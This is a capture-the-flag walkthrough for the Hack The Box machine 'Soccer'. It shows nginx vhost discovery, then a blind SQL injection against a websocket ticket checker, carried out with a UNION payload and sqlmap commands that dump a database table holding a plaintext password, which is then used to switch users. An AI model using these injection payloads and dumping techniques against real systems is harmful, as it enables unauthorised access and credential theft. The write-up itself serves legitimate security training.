Enumeration

I find another vhost in the nginx configurations in /etc/nginx

After the register and log in

Unfortunately, we cannot read the user.txt as we only got the shell as www-data.

The config file of the newly found subdomain:

server {
        listen 80;
        listen [::]:80;

        server_name soc-player.soccer.htb;

        root /root/app/views;

        location / {
                proxy_pass http://localhost:3000;
                proxy_http_version 1.1;
                proxy_set_header Upgrade $http_upgrade;  
                proxy_set_header Connection 'upgrade';
                proxy_set_header Host $host;
                proxy_cache_bypass $http_upgrade;
        }

}

We cannot read the config files as they are in root. But we know MySQL is running as there is a mysql directory in /etc.

SQL Injection

Putting the wrong ticket gives us an error

We know now its vulnerable.

Thats a Boolean-based Bilnd SQLi.

When checking it out with burpsuite it only sends the id as JSON. Its a websocket denoted by ws.

We only get Ticket Exists when the query is successful. We can use that information. As we know that using UNION we can query and test for columns.

So we get back 3 columns.

User enumeration

0xdf explained it nicely.

This query will look through the users table in the MySQL database and it will return true if a user whose name starts with a exists. That's all we need.

UNION select user,2,3 from mysql.user where user like 'a%'-- -"

Now we just brute force it to get the full usernames. Doing it manually isn't the most efficient way.

sqlmap -u "ws://soc-player.soccer.htb:9091" --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3

sqlmap identified the following injection point(s) with a total of 373 HTTP(s) requests:
---
Parameter: JSON id ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: {"id": "-9721 OR 4926=4926"}

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: {"id": "1234 AND (SELECT 1786 FROM (SELECT(SLEEP(5)))lQDM)"}
---

Now we can make mysql to dump the databases with -dbs.

available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] soccer_db
[*] sys

After enumerating the tables in soccer_db we find the credentials:

sqlmap -u ws://soc-player.soccer.htb:9091 -D soccer_db -T accounts --dump --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3 --threads 10

Database: soccer_db
Table: accounts
[1 entry]
+------+-------------------+----------------------+----------+
| id   | email             | password             | username |
+------+-------------------+----------------------+----------+
| 1324 | [email protected] | PlayerOftheMatch2022 | player   |
+------+-------------------+----------------------+----------+

player, thats the folder we saw in /home.

www-data@soccer:~/html/tiny$ su player
Password: 
player@soccer:/var/www/html/tiny$

PreviousFoothold NextPrivEsc

Last updated 10 months ago